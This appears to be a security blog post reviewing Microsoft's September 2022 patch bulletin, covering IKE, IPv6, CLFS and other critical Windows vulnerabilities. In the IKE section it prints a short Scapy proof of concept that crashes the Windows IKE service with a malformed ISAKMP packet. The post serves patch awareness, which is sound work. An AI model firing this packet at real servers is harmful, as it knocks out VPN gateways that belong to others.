Blog: Fortigate CVE-2023-27997 (XORtigate) in the eyes of the owl
Microsoft Security Bulletin of September 2022
Remote code execution on VPN protocol IKE / CVE-2022-34721 and CVE-2022-34722
If you have a Windows server that acts as an IPSec VPN gateway, then it is vulnerable to 2 remote code executions, allowing full control, without authentication.
If in addition this server is exposed on the Internet… I think you’re going to have a bad weekend 😉.
CVSS score: 9.8/10.
As a bonus, here is a non-stability exploit that only crashes the service but within a few hours the exploit will be stability and exploited in the wild 😉: https://github.com/78ResearchLab/PoC/tree/main/ CVE-2022-34721
The exploit source code :
from scapy.all import * from scapy.contrib.ikev2 import * from scapy.layers.isakmp import * import socket, time target = ("192.168.159.134", 500) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3) pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f") sock.sendto(raw(pkt), target) Please do not launch it on production servers 😄
Local privilege escalation with the log API (Windows Common Log File System / CLFS) / CVE-2022-37969
This API is accessible by any application willing to log things and this vulnerability allows to elevate its privileges but only if the attacker already has a first execution of code or partial takeover of the target (or is a teasing user 😅).
The particularity of this vulnerability is that it has been discovered by several security companies (Mandiant, Zscaler, Crowdstrike) as being exploited in the wild. Understand: customers of theirs have been hacked and this vulnerability has been used by attackers to advance attacks or directly into their malware.
Remote code execution on IPv6 / CVE-2022-34718
This one is funny because if you have a Windows system with IPv6 enabled (which is the case by default), then it is possible to send you a specially formatted network packet resulting in code execution, remotely, without authentication. And since IPv6 is at the kernel level, it’s a total takeover 🎉.
CVSS score: 9.8/10.
Unless I’m mistaken, this is a routable packet, so the vulnerability looks like it could be exploited on the internet. Afterwards, understand Microsoft, IPv6 is recent, it has only been supported by Microsoft for 20 years 😜! (Since Windows XP and especially XP SP1) https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718
There are still plenty of vulnerabilities, some of which are:
- Code executions in Visual Studio…protect your developers 👍(CVE-2022-35777, CVE-2022-35825, CVE-2022-35826, CVE-2022-35827);
- Privilege escalations from Exchange (mail);
- Nice remote, unauthenticated code execution on Windows servers serving as a “PPP” VPN gateway (CVE-2022-30133);
- Remote code execution without authentication on the Bluetooth driver 😨 . Disable your computer’s Bluetooth by default, it’s a good practice (CVE-2022-30144);
- Unauthenticated remote code execution on the NFS file sharing service 😱 (CVE-2022-34715);
- Remote code execution without authentication on the SMB file sharing service, both client and server 😲 (CVE-2022-35804);
- Bypassing Excel restrictions that can be used in phishing to result in code execution (CVE-2022-33631);
- A local elevation of privileges from the Windows Fax service. Yes yes, in 2022, the Fax… (CVE-2022-34690);
- More vulnerabilities in the print spooler. I lost count but we must have passed the twentieth 🤯 (CVE-2022-35755, CVE-2022-35793);
- A virtual machine breakout on Hyper-V (CVE-2022-34696);
- A Credential Guard bypass, meant to protect your in-memory passwords and password digests (CVE-2022-34709);
- A bypass of Windows Hello authentication, supposed to keep your computer locked 🤦♂️ (CVE-2022-35797);
- Bypasses of Secure Boot, supposed to protect the boot of your computer (CVE-2022-34301 and CVE-2022-34303);
- And finally, 16 vulnerabilities in the Chromium-Edge browser.
Finally… there are some pretty critical vulnerabilities that need to be patched quickly 😉.
Last funny point, with this bulletin, Microsoft corrects its thousandth flaw of the year, youhou.. bravo… champagne 🍾.
It’s a very nice (ironic) anniversary to celebrate the official publication of the “Cyber Resilience Act”. which will require publishers to provide security assistance, security updates and a guarantee that digital products comply with cybersecurity requirements throughout their lifecycle. But that’s another topic we’ll talk about again😉: https:// twitter.com/MaliciaRogue/status/1570366397737222144
Good luck 👍